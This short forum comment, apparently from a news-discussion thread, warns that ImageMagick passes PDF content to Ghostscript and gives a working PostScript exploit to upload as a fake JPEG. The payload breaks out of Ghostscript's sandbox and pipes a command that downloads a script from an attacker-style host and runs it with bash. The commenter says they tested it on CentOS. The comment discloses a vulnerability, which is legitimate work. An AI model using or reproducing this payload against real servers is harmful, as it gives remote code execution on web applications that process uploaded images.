This is really critical. ImageMagick's convert uses Ghostscript by default if it detects PDF content, so there are lots of webapps vulnerable now. Is some cases, uploading a test.jpeg with the following text content might be sufficient to execute code on the server (I just tested this on centOS)
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://evilc0rp.co/evil.sh | bash) currentdevice putdeviceprops
1 comment
[ 2.9 ms ] story [ 14.3 ms ] thread